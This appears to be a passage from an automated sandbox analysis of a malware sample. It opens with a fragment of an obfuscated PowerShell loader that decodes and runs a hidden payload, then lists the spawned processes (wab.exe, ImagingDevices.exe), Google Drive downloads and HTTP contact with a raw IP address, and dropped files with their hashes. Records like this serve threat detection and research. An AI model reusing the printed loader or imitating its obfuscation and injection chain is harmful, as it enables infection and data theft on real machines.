(splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.179.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 215.191.184.137.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/3568-4-0x00007FFBC2363000-0x00007FFBC2365000-memory.dmp

memory/3568-10-0x0000015BEB250000-0x0000015BEB272000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hsk0auo1.35f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3568-15-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

memory/3568-16-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

memory/3568-18-0x00007FFBC2363000-0x00007FFBC2365000-memory.dmp

memory/3568-19-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

memory/2820-21-0x0000000002830000-0x0000000002866000-memory.dmp

memory/2820-22-0x0000000005230000-0x0000000005858000-memory.dmp

memory/2820-23-0x0000000005190000-0x00000000051B2000-memory.dmp

memory/2820-24-0x0000000005960000-0x00000000059C6000-memory.dmp

memory/2820-25-0x0000000005A80000-0x0000000005AE6000-memory.dmp

memory/2820-35-0x0000000005B30000-0x0000000005E84000-memory.dmp

memory/2820-36-0x0000000006140000-0x000000000615E000-memory.dmp

memory/2820-37-0x00000000061D0000-0x000000000621C000-memory.dmp

memory/2820-38-0x0000000007AD0000-0x000000000814A000-memory.dmp

memory/2820-39-0x00000000066E0000-0x00000000066FA000-memory.dmp

memory/2820-40-0x0000000007450000-0x00000000074E6000-memory.dmp

memory/2820-41-0x0000000007370000-0x0000000007392000-memory.dmp

memory/2820-42-0x0000000008150000-0x00000000086F4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Carbines.Que

MD5 fed7d2b1a62075a148249e5d86063b30
SHA1 f2e3c9605313437d6dc1668982f8d8c21d42d75d
SHA256 c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba
SHA512 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450

memory/2820-44-0x0000000008700000-0x000000000C26E000-memory.dmp

memory/3568-61-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

memory/4024-58-0x0000000000C00000-0x000000000476E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-355097885-2402257403-2971294179-1000\0f5007522459c86e95ffcc62f32308f1_30dd1cc1-5c25-4745-b2f5-cffa52b1a886

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61